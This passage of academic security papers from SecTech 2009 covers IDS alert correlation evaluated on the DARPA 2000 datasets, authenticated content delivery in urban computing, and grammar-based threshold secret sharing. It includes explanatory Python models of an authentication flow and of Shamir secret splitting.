4.1 Method Validation
To evaluate our method, we used the DARPA 2000 dataset [3]. There are two attack scenarios: LLDOS 1.0 and LLDOS 2.0.2. In both scenarios a novice attacker tries to install the components necessary to run a Distributed Denial of Service and then launches a DDoS against a US government site. We tested our method on both
Correlating Alerts into Compressed Graphs
23
0:Admind 3 1:Sadmind_Ping
1 1 10
7
10
10 3:Admind
6
14
1
6:Admind
13 1
1
1
9
9
10
1
7:Sadmind_Amslverify_Overflow
7
9
8 34:Rsh
8
54:TelnetTerminaltype
1
1 1
49:Mstram_Zombie
1 52:Rsh
1 1 53:Mstream_Zombie
55:TelnetXdisplay
1
1 1
1 41:Mstream_Zombie
1
1 1
1 1
1
1
1
1 1
1
56:TelnetEnvAll 1
57:Mstream_Zombie
Fig. 1. Hyper alert graph created for LLDOS1.0
datasets, but we can illustrate the result of our experiments only on the first dataset due to space limitations. We used RealSecure to generate alerts for the datasets. Figure 1 displays a hyper alert built for LLDOS1.0 . RealSecure does not raise any alert for the first step of attack but a few ’sadmind-ping’ alerts are generated when the attacker tries to find out which hosts are running the ’sadmind’ remote administration tool. Then, attacker wants to penetrate into the hosts recognized as vulnerable machines in previous step. So IDS raises several ’admind’ and ’sadmind-amslverify-overflow’. For the fourth step, logging into victims and installing ’mstream’ software cause five types of alerts, ’Rsh’, ’TelnetXdisplay’, ’TelnetEnvAll’, ’TelnetTerminaltype’ and ’Mstream-Zombie’. The last stage of attack leading to a few ’stream-DOS’ alerts could be included in the hyper alerts through initializing the corresponded cells in the knowledge base with proper values. As can be seen in the Fig. 1, all alerts were accurately correlated. 4.2
Method Evaluation
In this section, we compare three configurations of our implementation to show the effectiveness of the method. In the first configuration we used neither time windows nor the compression method: the new alert is compared with all received alerts. In the second configuration we added time windows, and the third configuration is our complete correlation method. Figure 2 shows the differences between these configurations in terms of the number of comparisons. Evidently, the number of comparisons in the first configuration is almost four times as high as the figure for the third configuration, because the compression method merges similar nodes and reduces the candidate alerts for comparison. However, according to Fig. 3, the second configuration performed better than the others with regard to accuracy, because it avoids comparing the new alert with very old alerts that can deflect our method from working correctly. Since the compression procedure aims to merge some nodes, it naturally loses some details, which has a small impact on the error rate of the correlation system, but it is still much better than the first configuration.
[Fig. 2: bar chart; y-axis "Number of comparisons (thousands)" (0–450), x-axis "Dataset" (LLDOS1.0, LLDOS2.0.2), series C1, C2, C3 for the three configurations]
Fig. 2. No. of comparisons in the three configurations
[Fig. 3: bar chart; y-axis "Error" (0–10), x-axis "Dataset" (LLDOS1.0, LLDOS2.0.2), series C1, C2, C3 for the three configurations]
Fig. 3. Errors in the three configurations
5 Related Works
A class of alert correlation methods aims to find causal relationships among alerts through their pre- and post-conditions [4,5,6]. If the post-conditions of an alert satisfy the pre-conditions of another alert, they are correlated. Specifying pre- and post-conditions is time-consuming and error-prone. Additionally, if there is no causal relationship between two alerts, they will not be correlated. The second group of alert correlation techniques is pre-defined attack-scenario-based methods [7,8]. If alerts contribute to the construction of a predefined attack scenario, they should be correlated. Unfortunately, it is not reasonable to assume that the defender can reliably know all vulnerabilities on the network to create a complete attack graph. Moreover, if the attacker launches an unknown attack, these methods cannot work properly. Some methods utilize machine learning techniques for alert correlation [9,10,11]. Our work in this paper is slightly similar to [11]. However, the method proposed in [11] seems costly and impractical: comparing the new alert with all received alerts, as done in [11], is not practical. Finally, temporal-based methods [12,13] correlate alerts according to their temporal relationships. This class of methods is capable of correlating alerts that may contribute to unknown attacks, but if the attacker puts delays into his attack strategy, he can evade the security system. The way we apply time windows resolves this problem to a great extent.
6 Conclusion and Future Works
In this paper, we proposed a method that employs a classifier to estimate the correlation probability between alerts based on their attributes. Correlated alerts are organized in several hyper alerts. Since recent alerts are more important in correlation, we consider time windows over hyper alerts. Hyper alerts are compressed with a predefined frequency by merging those alert sets that are very similar and were raised in the same time window. According to the experiments, compression greatly reduces the number of comparisons. Our method can discover unknown attacks because it does not depend on domain knowledge about known attacks. In our future research, we will develop a technique to find the values of the thresholds and variables automatically during the correlation process.
References
1. Ahmadinejad, S.H., Jalili, S.: Alert correlation using correlation probability estimation and time windows. In: International Conference on Information Theory and Engineering, Kota Kinabalu, Malaysia. IEEE Computer Society CPS, Los Alamitos (2009)
2. Friedman, J., Hastie, T., Tibshirani, R.: Additive logistic regression: A statistical view of boosting. Annals of Statistics, 337–374 (2000)
3. DARPA 2000 intrusion detection evaluation datasets (2000), http://www.ll.mit.edu/mission/communications/ist/corpora/ideval/data/index.html
4. Ning, P., Cui, Y.: An intrusion alert correlator based on prerequisites of intrusions. Technical Report TR2002-01, Department of Computer Science, North Carolina State University (2002)
5. Ning, P., Xu, D.: Learning attack strategies from intrusion alerts. In: Proceedings of the 10th ACM Conference on Computer and Communications Security, pp. 200–209. ACM, New York (2003)
6. Templeton, S., Levitt, K.: A requires/provides model for computer attacks. In: Proceedings of the 2000 Workshop on New Security Paradigms, pp. 31–38. ACM, New York (2001)
7. Wang, L., Liu, A., Jajodia, S.: Using attack graphs for correlating, hypothesizing, and predicting intrusion alerts. Computer Communications 29(15), 2917–2933 (2006)
8. Siraj, A., Vaughn, R.: A cognitive model for alert correlation in a distributed environment. In: Kantor, P., Muresan, G., Roberts, F., Zeng, D.D., Wang, F.-Y., Chen, H., Merkle, R.C. (eds.) ISI 2005. LNCS, vol. 3495, pp. 218–230. Springer, Heidelberg (2005)
9. Li, Z., Zhang, A., Lei, J., Wang, L.: Real-Time Correlation of Network Security Alerts. In: Proceedings of the IEEE International Conference on e-Business Engineering, pp. 73–80. IEEE Computer Society, Washington (2007)
10. Dain, O., Cunningham, R.: Fusing a heterogeneous alert stream into scenarios. Applications of Data Mining and Computer Security (2002)
11. Zhu, B., Ghorbani, A.: Alert correlation for extracting attack strategies. International Journal of Network Security 3(3), 244–258 (2006)
12. Qin, X., Lee, W.: Statistical causality analysis of infosec alert data. In: Vigna, G., Krügel, C., Jonsson, E. (eds.) RAID 2003. LNCS, vol. 2820, pp. 73–93. Springer, Heidelberg (2003)
13. Benjamin, M., Herve, D.: Correlation of Intrusion Symptoms: An Application of Chronicles. In: Vigna, G., Krügel, C., Jonsson, E. (eds.) RAID 2003. LNCS, vol. 2820, pp. 94–112. Springer, Heidelberg (2003)
A Study on Secure Contents Using in Urban Computing
Hoon Ko1, Jongmyung Choi2, and Carlos Ramos1
1 GECAD, Institute of Engineering Polytechnic of Porto, Rua Dr. Antonio Bernardino de Almeida, 431, 4200-072 Porto, Portugal
[email protected], [email protected]
2 Department of Computer Engineering, Mokpo National University, 61, Dorim-Li, Chyounggye-Myeun, Muan-Gun, Jeon-nam, S. Korea
[email protected]
Abstract. Urban computing provides services by taking into account the user's devices and the environment near the user's location. That is, the user's movement can be detected by sensors from the contexts generated while the user moves, and the user's next movement can be guessed from these detected contexts. The number of contexts grows as the user moves, and the more users there are, the more contexts the sensors detect. Therefore, there are many users and devices exposed to attack. However, existing urban computing is insufficient in processing a security module. We studied how urban computing has to be used in safety. In this paper, we suggest a way to secure the contents used in urban computing. Keywords: Urban Computing, Context-Aware, Contents, Spam-mail, Authentication / Authorization.
1 Introduction
An aim of urban computing is to continually provide services between users and the space / environment information near moving users [3]. That is, users can receive all services on their devices while moving, through organic processing between the user's environment and the space environment. The relations among users, and between users and urban constituents, are very important in urban space, because users usually ask for useful services while moving and would also like to receive the services they want from shops without stopping. Users may periodically want to get such information, or get it during their shopping. These days, sending information to users is usually done by SMS or letter. Although some companies serve users' requests, there are still problems such as no product details and sending information to users who do not want it. This can be considered as SPAM mail in the future. In order to receive the information they want to be sent, users first have to register their request with the shops (called CP, the server in each shop). The contents provider (CP) must keep it up to date, and a certificate server (CS) and a secure server (SS) should control the security service between contents servers and users. CS and SS also have to watch for attacks by attackers. If attackers illegally put their information into a CP, users in the database may receive unwanted information. To prevent these problems, CS has to perform an authentication to confirm the integrity of their requests. This article is composed of four sections. Section 1 is the introduction; we explain our proposed secure context operation in Section 2; Section 3 gives some discussion. Finally, we conclude in Section 4.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 26–34, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Secure Context Operating
2.1 Security Functions
We explain the mission of each of the four components for secure processing in urban computing, which are a context detector, a context collector, a context analyzer and a context allocator [Fig. 1] [4].
Context Detector (CD): CD detects all context changes.
Context Collector (CC): CC gathers all contexts from CD. The first security processing (authentication / authorization) is this area's job. All contexts detected by the sensors are transferred to the security framework [4][9], where they receive security processing. According to this process, it is decided whether the security level is set or not.
Context Analyzer (CA): CA defines the security policy for the context received from CC.
Context Allocator (CoA): CoA arranges them suitably to each module.
Fig. 1. Security Functions
2.2 Urban Life
User A and user B have to register their requests about the product information they want before moving. Also, each shop has to keep its product information in the CP up to date [Fig. 2].
Table 1. Definition
Symbol  Name
C       Contents
CS      Certificate Server
CP      Contents Provider
SS      Secure Server
[Fig. 2: diagram of secure servers SS.1–SS.3 controlling contents providers CP.1–CP.6; shops A.Shop, B.Shop and C.Shop put their information into their CP for each user; CP.3 forbids unauthorized / unauthenticated shop information; users A, B, D, E, G, H and I ask for information and each CP keeps their asked lists; legend: C = Contents, CP = Contents Provider, SS = Secure Server, CS = Certificate Server]
Fig. 2. Urban Life. User A and user B have to register the information they request before moving.
Therefore, CP keeps some information, namely the users' requested items and the product contents registered by the shops, and then CP sends information to the user's device according to the relations between the tables in the databases. The defined symbols are given in Table 1.
2.3 Each Step
Each user puts their asking into the shop's computer as below. (The shops register their information into the related CP; CP.1 controls A.Shop and CP.2 manages B.Shop.)
// A.Shop.CP.1 / B.Shop.CP.2
A.User's Asking::[/P.1.Cont.2/P.2.Cont.1/]->CP.1
A.User's Asking::[/P.3.Cont.1/]->CP.2
B.User's Asking::[/P.2.Cont.1/P.2.Cont.1/]->CP.2
Fig. 3. Steps
Fig. 4. CP, contents and user certificates. CS keeps the security information of SS, and SS controls CPs and users.
Each CP detects the users' movement when they are in its area. As soon as CP is aware of user A, it transfers the requested information to user A.
Fig. 5. New user
2.4 Security Processing
If CS receives a request from CP to confirm SS, then CS processes it. Basically, CS follows the structures and policies of PKI. SS is responsible for the authentication of CPs and users. Therefore, SS manages the security information for users and CPs, and it can send the security results to each of them if they want it. Also, SS generally processes the user's confirmation through CS. Consider user D, who did not register his information in CP.1 and SS.1, so CP.1 and SS.1 have no information about user D. Consequently, CP.1 and SS.1 reject user D without hesitation as soon as user D asks [Fig. 4, red line]. If in the near future user D wants to receive product information from them, he first has to put his request to the shop (1). CP.1 transfers the user's request information to SS.1, and SS.1 confirms CP.1 / user D (2). Of course, SS.1 first identifies CP.1's request through user D (3)(4). When SS.1 replies with the result to CP.1, all processing for user D is finished (5)(6) [Fig. 5].
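The checks of Sections 2.3 and 2.4 as a small executable model, added here and not the paper's code: an unauthenticated shop may not put information into a CP, and a user's asking is stored only after SS confirms the CP through CS and finds the user registered (user D is rejected until he registers). The PKI the paper relies on is abstracted to a CS registry, and the method names and the (1)–(6) message log are assumptions.

```python
"""Toy model of the CP / SS / CS roles of Section 2.4 (added example)."""
from dataclasses import dataclass, field


@dataclass
class CertificateServer:
    """CS: keeps the security information of SS and CP (stand-in for the PKI trust root)."""
    certified: set = field(default_factory=set)

    def certify(self, name):
        self.certified.add(name)

    def confirm(self, name):
        return name in self.certified


@dataclass
class SecureServer:
    """SS: responsible for the authentication of CPs and users."""
    name: str
    cs: CertificateServer
    users: set = field(default_factory=set)  # users who registered with this SS

    def register_user(self, user):
        self.users.add(user)

    def confirm(self, cp_name, user, log):
        """Steps (2)-(5): identify the CP through CS, then check the user registry."""
        log.append(f"(2) {cp_name} -> {self.name}: confirm {user}")
        log.append(f"(3) {self.name} -> CS: identify {cp_name}")
        cp_ok = self.cs.confirm(cp_name)
        log.append(f"(4) CS -> {self.name}: {cp_name} {'known' if cp_ok else 'unknown'}")
        ok = cp_ok and user in self.users
        log.append(f"(5) {self.name} -> {cp_name}: {'accept' if ok else 'reject'} {user}")
        return ok


@dataclass
class ContentsProvider:
    """CP: stores the shops' product contents and each user's asked list."""
    name: str
    ss: SecureServer
    cs: CertificateServer
    contents: dict = field(default_factory=dict)  # (product, content) -> text
    asked: dict = field(default_factory=dict)     # user -> set of (product, content)

    def put(self, shop, key, text):
        """Only an authenticated shop may put information (the CP.3 rule of Fig. 2)."""
        if not self.cs.confirm(shop):
            return False
        self.contents[key] = text
        return True

    def ask(self, user, keys, log):
        """Steps (1) and (6): the asking is stored only if SS confirms CP and user."""
        log.append(f"(1) {user} -> {self.name}: ask {sorted(keys)}")
        if not self.ss.confirm(self.name, user, log):
            log.append(f"(6) {self.name} -> {user}: rejected")
            return False
        self.asked.setdefault(user, set()).update(keys)
        log.append(f"(6) {self.name} -> {user}: accepted")
        return True

    def deliver(self, user):
        """What CP sends when it detects the user in its area: only asked contents."""
        return {k: self.contents[k] for k in self.asked.get(user, ()) if k in self.contents}


def scenario():
    """Constructed run: A.Shop and user A are registered, user D is not (red line of Fig. 4)."""
    cs = CertificateServer()
    for name in ("SS.1", "CP.1", "A.Shop"):
        cs.certify(name)
    ss1 = SecureServer("SS.1", cs)
    ss1.register_user("A.User")
    cp1 = ContentsProvider("CP.1", ss1, cs)
    log, r = [], {}
    r["shop_put"] = cp1.put("A.Shop", ("P.1", "Cont.2"), "product 1, content 2")
    r["rogue_put"] = cp1.put("Z.Shop", ("P.9", "Cont.1"), "unsolicited offer")
    r["A_ask"] = cp1.ask("A.User", {("P.1", "Cont.2"), ("P.2", "Cont.1")}, log)
    r["D_before"] = cp1.ask("D.User", {("P.1", "Cont.2")}, log)
    ss1.register_user("D.User")  # D puts his request to the shop and gets registered
    r["D_after"] = cp1.ask("D.User", {("P.1", "Cont.2")}, log)
    r["A_gets"] = cp1.deliver("A.User")
    return r, log


if __name__ == "__main__":
    results, messages = scenario()
    print(results)
    print("\n".join(messages))
```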
3 Discussion
3.1 Algorithm
Table 2 gives the notation used for the analysis in this article. In this research, we suppose that there are N users, randomly distributed over the network channels (shops). Each user moves in their own way.
Model Initial {
    n = N, Ti = user avg. inactivation time          / arrival schedule of first asking
    Contents asking / processing                       / processing and contents beginning schedule for arrival
    n = n − 1                                          / schedule
    (time() + expntl(Ti / n)) * f(xn * wn)             / next arrival asking
}
Table 2. Notation
Symbol    Contents
xn        The number of users (1, 2, …, n)
yn        Output values of each user
wi        Weight (e.g. security rate, power, etc.)
f1        Activation function for Users * Weight
f2        Activation function for Transferring Time * Contents Size
sn        Contents size of user n
tn        Transferring time
T         Critical values
b         Bias point
Cost (C)  Total cost
Fig. 6. Cost model
Fig. 6 shows the cost estimation that arises when contents are transferred through the proposed model. We put the user's information into the proposed algorithm in order to obtain the activation point of the user, that is, users, weight, message size and transferring time. Formula 1 is the cost generation algorithm for user i.
$$y_i = f_1(x_i \times w_i) + f_2(s_i \times t_i) \qquad \text{(Formula 1)}$$
And we define the algorithm for the total cost as in Formula 2.
$$Cost(C_n) = f_1(x_n \times w_n) + f_2(s_n \times t_n) \qquad \text{(Formula 2)}$$
The cost for users is computed as the sum of (the number of users * weight, Formula 3) and (transferring time * content size, Formula 4).
$$f_1(x_n \times w_n) = x \cdot w^T = [x_1, x_2, \dots, x_n] \begin{bmatrix} w_1 \\ w_2 \\ \vdots \\ w_n \end{bmatrix} = x_1 \cdot w_1 + x_2 \cdot w_2 + \dots + x_n \cdot w_n \qquad \text{(Formula 3)}$$
$$f_2(s_n \times t_n) = s \cdot t^T = [s_1, s_2, \dots, s_n] \begin{bmatrix} t_1 \\ t_2 \\ \vdots \\ t_n \end{bmatrix} = s_1 \cdot t_1 + s_2 \cdot t_2 + \dots + s_n \cdot t_n \qquad \text{(Formula 4)}$$
Table 3. Experiment
Items                        Contents
The number of CS             1
The number of SS             2
The number of CP             3
The number of CP a user      1.4
The number of User           100
Content Length (Size)        Random (100)
Key Length for Security      512 bits
Link Delay                   10ms
Stay Time a User (sec)       Random (100)
Empty CRL Size (Structure)   55kb
Simple Certificate Size      1kb
Experiment Time              1000 sec
The environment of the experiments is given in Table 3. CROSSCERT, a security company (VeriSign) in Korea, usually assigns one CRL file per 1000 certificates. An empty CRL is 55kb in size, and each certificate is assigned 3kb. However, as a result of analysing our certificate, the size of a certificate is normally a little less or more than 1kb. (If we use the extension area of our certificate, that size may be bigger than 1kb in future.) Finally, we defined the average certificate size as 1kb in this article.
3.2 Result of Experiments
The number of CP is defined as xn in the experiment. In future, the definition for users will be defined by the users' requests.
CASE 1: User A wants to receive information from 2 CPs; the weight of CP.1 is 0.5 and that of CP.2 is 0.3. The content size in CP.1 is 4 and in CP.2 is 2, and the transferring times are 0.3 and 0.4 respectively.
ANSWER 1: $f_1(x_n \times w_n) + f_2(s_n \times t_n) = \{(2 \times 0.5) + (2 \times 0.3)\} + \{(4 \times 0.3) + (2 \times 0.4)\} = 1.6 + 2.0 = 3.6$
Finally, the total cost for user A is 3.6. We applied this algorithm to 100 users in the same way. We let them sequentially enter the experiment area (service area) during the experiment time. Table 4 gives the resulting average interarrival time, average waiting time in queue and average cost.
Table 4. Results
Item                    Average Time
Interarrival Time       4.47
Waiting Time in Queue   3.47
Total Cost              0.57
Fig. 7. The result of experiment
The average time to enter the service area is 4.47 sec. The service time from CP after entering that area is 3.47 sec; we call it the waiting time in queue. This waiting time is used in Notation 1 as a kind of weight. Therefore, if the waiting time gets longer, the total cost increases. Lastly, the total cost for 100 users is 0.57. Fig. 7 shows the result of the experiment. There are 33 users with a total cost between 0 and 2, which is the minimum cost, and the maximum cost is 16, reached by 2 users.
4 Conclusion
We studied the way in which users can safely receive the information they request while moving, from a CP near them. Of course, we partially put in an algorithm for security between users and CPs, such as authentication. However, there are still some insufficient points requiring detailed research on the users' variables, the users' and CPs' weights, etc. Therefore, we need to study these issues in more detail in future, and have to study further how to respond to security changes of users and CPs.
Acknowledgments
This work is partially supported under the support of the Portuguese Foundation for Science and Technology (FCT) in the aims of Ciência 2007 program for the hiring of Post-PhD researchers.
References
1. IST Advisory Group: Scenarios for Ambient Intelligence in 2010. European Commission (2001)
2. Ramos, C., Augusto, J.C., Shapiro, D.: Ambient intelligence: the next step for artificial intelligence. IEEE Intelligent Systems 23(2), 15–18 (2008)
3. Franinovic, K., Visell, Y.: Modulating Urban Atmospheres: Opportunity, Flow, and Adaptation. In: Urban Computing Conference 2005, Metapolis and Urban Life Workshop Proceedings, pp. 82–87 (2005)
4. Ko, H., Ramos, C.: A Study on Security Framework for Ambient Intelligent Environment (ISyRAmI SF: ISyRAmI Security Framework). In: ICWMC 2009, pp. 93–98 (2009)
5. Ma, M.: Authorization delegation for u-City in subscription-based. Computers & Security, 371–378 (2006)
6. Yang, S.J.H.: Context-Aware Ubiquitous Learning Environments for Peer-to-Peer Collaborative Learning. Educational Technology & Society, Security, 188–201 (2006)
7. Chen, G., Kotz, D.: A Survey of Context-Aware Mobile Computing Research. Technical Report TR2000-381, Dartmouth College, Hanover, NH, USA
8. Ward, A., Jones, A., Hopper, A.: A new location technique for the active office. IEEE Personal Communications 4(5), 42–47 (1997)
9. Ma, M.: Authorization delegation for u-City in subscription-based. Computers & Security, 371–378 (2006)
10. Meiier, R., Cahill, V.: Location-Aware Event-Based Middleware: A Paradigm for Collaborative Mobile Application. Computers & Security, 371–378 (2006)
11. Yang, S.J.H.: Context-Aware Ubiquitous Learning Environments for Peer-to-Peer Collaborative Learning. Educational Technology & Society, Security, 188–201 (2006)
12. Vieira, M.S., Rosa, N.S.: A Reconfigurable Group Management Middleware Service for Wireless Sensor Networks. In: MPAC 2005, November 2005, pp. 1–8 (2005)
13. Sivaharan, T., Blair, G., Conlson, G.: GREEN: A Configurable and Re-configurable Publish-Subscribe Middleware for Pervasive Computing. In: Meersman, R., Tari, Z. (eds.) OTM 2005. LNCS, vol. 3760, pp. 732–749. Springer, Heidelberg (2005)
Shadow Generation Protocol in Linguistic Threshold Schemes
Marek R. Ogiela and Urszula Ogiela
AGH University of Science and Technology, Al. Mickiewicza 30, PL-30-059 Krakow, Poland
{mogiela, ogiela}@agh.edu.pl
Abstract. The field of secret splitting algorithms has recently seen solutions based on using syntactic methods to create further information used as an additional component of the split secret. One such solution is linguistic threshold schemes, which use context-free grammars to code the input string representing the shared secret. This study describes a general protocol for creating secret components using this approach. This solution allows the known, traditional secret sharing algorithms to be extended into algorithms executed in a hierarchical way. Such methods can then be used to split and manage information in various information structures that have linear characteristics or divisional dependencies. Keywords: Secret sharing, threshold schemes, information management.
1 Introduction
One important problem related to using information splitting or sharing algorithms is the ability to use them for the intelligent management and distribution of important data. Such operations are carried out in modern enterprises, corporations or state institutions. In this case, information management is particularly important with regard to data that is strategic for the given organization. It requires the use of intelligent solutions that allow data to be allocated according to certain rights. This has led to the need to develop new, advanced algorithmic solutions that would facilitate such an intelligent allocation of important data, and then allocate the appropriate parts to the decision-making groups at various management levels or having the appropriate access rights to the shared data of a strategic nature. Obviously, two types of structural information split can be distinguished: a split can, for example, be hierarchical or by layers. The principal difference between these types of splits concerns the method of introducing the split itself. When a split is made within homogenous, uniform groups of layers, it is a layer split, whereas if the split is made regardless of the homogeneity of the group or layer but by reference to several groups ordered hierarchically, it is a hierarchical split. Information can be divided both within the entire structure in which some hierarchical dependency is identified, or within a given group as well as within any homogenous layer. This is why, depending on the type of information split, it makes sense to identify correctly selected information splitting algorithms. Algorithms for the multi-level splitting of confidential or secret information are designed using structural analysis and the linguistic recording of data. The structural analysis used for this kind of task is based on the analysis of the structure of the business organisation and can be designed for a specific organisation, or splitting and sharing algorithms can be designed for a broader group of organisations, which proves that the method is universal. However, one must be aware that the group should be homogenous in terms of the structure of the organisations forming part of it. Another important component of information splitting algorithms is the use of linguistic data recording methods [13]. This type of information recording and presentation refers to a syntactic data analysis. The key in this approach is that it uses mathematical formalisms and linguistic methods which allow an additional stage to be introduced which enhances the functionality of classical threshold schemes of information sharing [3, 4, 10, 12, 16]. Such enhanced linguistic schemes and information splitting protocols will be presented in this paper.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 35–42, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Shadow Generation Protocol in Linguistic Schemes
First, a generalized algorithm will be described that allows coding to be carried out using the approach of mathematical linguistics. Context-free grammars will be used here to introduce an additional stage of coding the input representation of the shared data or the secret allocated in a hierarchical way. In practice, the use of such a grammar will allow us to strengthen the secret splitting algorithm used and to obtain a certain additional secret (a part of the split information) in the form of rules of the used formal grammar. The general methodology of using formal languages to enhance a traditional threshold scheme is as follows:
1. one of the classical secret sharing schemes (e.g. Shamir's, Blakley's or Tang's algorithm [6, 14, 16]) is used to encode the input secret;
2. the split data is transformed into a bit sequence;
3. a new formal grammar is defined which generates bit or bit block positions for the shared data;
4. the bit (or bit block) sequence is parsed with an analyser defined for the introduced grammar;
5. the parsing generates a sequence of grammar rules which allow the bit representation of the shared secret to be generated;
6. the secret represented by a sequence of production numbers is split using the threshold scheme selected (in step 1);
7. shadows are distributed to particular participants of the protocol.
These stages determine the basic actions necessary to generate the components of shared information which can be communicated to the participants of the entire procedure of allocating the split data. A proposal for splitting information using context-free grammars is presented in Fig. 1.
Fig. 1. A linguistic threshold scheme. The enhancement consists in using a grammar at the stage of changing the bit representation into sequences of numbers of grammar rules.
The solution presented in Fig. 1 shows how selected information is converted into its bit or bit block representation which is coded using the proposed grammar. The coded form of information can be split in the way presented in Figure 1. This is an (m, n)-threshold split in which just the main part of the secret, that is m or n-m of secrets is necessary to reconstruct the split secret. Every one of these main split parts allows the split secret to be successfully reconstructed. However, combining these components yields only the contents of the secret, which allows the input information to be decoded using grammatical reasoning methods (i.e. meaning analysis methods). The proposed modification of a threshold algorithm for information splitting and sharing consists in using a grammar at the stage of converting the bit representation into sequences of numbers of linguistic rules in the grammar. After this transformation is completed, any secret splitting scheme can be used, and the components can be distributed among any number n of protocol participants. If the allocation of grammatical rules remains a secret, then this is an arbitration protocol in which the reconstruction of a secret by the authorised group of shadow owners requires the involvement of a trusted arbitrator who has information on grammar rules. If the grammar is disclosed, the secret can be reconstructed without the involvement of a trusted person just on the basis of the secret components possessed by the authorised group of participants of the information splitting algorithm.
The proposed information sharing algorithm may apply to the execution of any classical (m, n)-threshold secret sharing algorithm. In the case of data splitting and sharing algorithms, the split secret is not the bit sequence itself, but the sequence composed of numbers of syntactic rules of the grammar introduced for the splitting. Depending on its structure and type, it can contain values of two or more bits. This is why the stage of converting the bit representation of the shared secret can also be generalised from the version coding single bits to the coding of bit blocks of various lengths. However, to avoid too many generation rules in the defined grammar, it is worth imposing a restriction on the length of coded bit blocks in the proposed scheme. It seems easy and natural to consider bit blocks no longer than 4-5 bits. To illustrate the idea of an enhanced linguistic coding, a generalised version of a linguistic information splitting algorithm will be presented for a grammar that converts blocks of several bits.
G = (VN, VT, SP, STS), where:
VN = {SECRET, BIT_BLOCK, 1B, 2B, 3B, 4B, 5B} – a set of non-terminal symbols;
VT = {ONE BIT, TWO BITS, THREE BITS, FOUR BITS, FIVE BITS, λ} – a set of terminal symbols which define each bit block value; λ denotes the empty symbol;
STS = SECRET – the grammar start symbol.
The production set SP is defined in the following way:
1. SECRET → BIT_BLOCK
2. BIT_BLOCK → BIT_BLOCK BIT_BLOCK
3. BIT_BLOCK → 1B | 2B | 3B | 4B | 5B
4. BIT_BLOCK → λ
5. 1B → ONE BIT
6. 2B → TWO BITS
7. 3B → THREE BITS
8. 4B → FOUR BITS
9. 5B → FIVE BITS
This type of grammar allows more complex information coding tasks to be executed, as the information is converted into the bit representation and in the next step is converted into a record of 2, 3, 4 or 5-bit clusters which become the basis for coding the original information. With regard to the proposals of the linguistic enhancement of threshold schemes presented here it is notable that the level of security achieved is independent of the length of blocks subjected to conversion with the use of rules of the introduced grammar. The methods of multi-level information splitting or sharing presented in this chapter, which use bit blocks of various lengths, show how information splitting algorithms can be significantly enhanced by adding elements of linguistic and grammatical data analysis. This is a novel solution. The length of bit blocks has a major impact on the speed and length of the stage of coding the input information representation, which is the stage that prepares information to be coded as a secret.
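The seven-step methodology of Section 2 carried through with the grammar just defined, as an added example that is not the authors' code. The secret's bits are cut into blocks of up to 5 bits, the leftmost derivation of each block is recorded as production numbers (rule 1, rule 2 once per extra block, then rule 3 and the terminal rule for each block), and the production sequence is split with Shamir's scheme, one of the classical schemes the text names. Assumptions not in the text: the caller fixes the block length, each terminal's block value is written right after the production that generated it, and the sequence is packed 6 bits per symbol into one field element before splitting.

```python
"""Linguistic threshold scheme: grammar coding followed by Shamir splitting (added example)."""
import secrets

TERMINAL_RULE = {1: 5, 2: 6, 3: 7, 4: 8, 5: 9}   # block length -> rule "nB -> ... BITS" (page numbering)
RULE_LENGTH = {rule: n for n, rule in TERMINAL_RULE.items()}
PRIME = 2**521 - 1                               # field for Shamir's scheme (a Mersenne prime)


def to_bits(data: bytes) -> str:
    return "".join(f"{byte:08b}" for byte in data)


def encode(bits: str, block_len: int) -> list:
    """Steps 3-5: leftmost derivation of the bit string, recorded as production numbers.
    Per block: rule 3 (choice of nB), the terminal rule for that length, the block value."""
    if not 1 <= block_len <= 5:
        raise ValueError("the grammar codes blocks of 1 to 5 bits")
    blocks = [bits[i:i + block_len] for i in range(0, len(bits), block_len)]
    coded = [1] + [2] * (len(blocks) - 1)        # SECRET -> BIT_BLOCK, then split into k blocks
    for block in blocks:                         # a short final block simply uses a shorter nB
        coded += [3, TERMINAL_RULE[len(block)], int(block, 2)]
    return coded


def decode(coded: list) -> str:
    """Inverse of encode: replay the productions and re-emit each terminal's bits."""
    it = iter(coded)
    if next(it) != 1:
        raise ValueError("derivation must start with SECRET -> BIT_BLOCK")
    bits = []
    for rule in it:
        if rule == 2:
            continue
        if rule != 3:
            raise ValueError(f"unexpected production {rule}")
        length = RULE_LENGTH[next(it)]
        bits.append(format(next(it), f"0{length}b"))
    return "".join(bits)


def pack(symbols: list) -> int:
    """6 bits per symbol behind a sentinel 1, so zero-valued leading symbols survive."""
    value = 1
    for s in symbols:
        value = (value << 6) | s
    return value


def unpack(value: int) -> list:
    symbols = []
    while value > 1:
        symbols.append(value & 63)
        value >>= 6
    return symbols[::-1]


def shamir_split(secret: int, k: int, n: int) -> list:
    """Step 6: shares (x, p(x)) of a random degree k-1 polynomial with p(0) = secret."""
    if not (0 <= secret < PRIME and 1 < k <= n):
        raise ValueError("secret too large for the field, or bad (k, n)")
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(k - 1)]
    shares = []
    for x in range(1, n + 1):
        y = 0
        for c in reversed(coeffs):               # Horner evaluation mod PRIME
            y = (y * x + c) % PRIME
        shares.append((x, y))
    return shares


def shamir_recover(shares: list) -> int:
    """Lagrange interpolation at x = 0; needs at least k distinct shares."""
    total = 0
    for i, (xi, yi) in enumerate(shares):
        num = den = 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % PRIME
                den = den * (xi - xj) % PRIME
        total = (total + yi * num * pow(den, -1, PRIME)) % PRIME
    return total


def split_secret(secret: bytes, block_len: int, k: int, n: int) -> list:
    """Steps 1-7 in order: bits -> grammar derivation -> packed integer -> shadows."""
    return shamir_split(pack(encode(to_bits(secret), block_len)), k, n)


def recover_secret(shares: list) -> bytes:
    bits = decode(unpack(shamir_recover(shares)))
    return int(bits, 2).to_bytes(len(bits) // 8, "big")
```

Keeping the grammar (the rule numbering and block-length convention) secret gives the arbitration variant described below, since shadows alone then reconstruct only the packed production sequence.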
Shadow Generation Protocol in Linguistic Threshold Schemes
3 Application of Linguistic Threshold Schemes in Layered and Hierarchical Structures

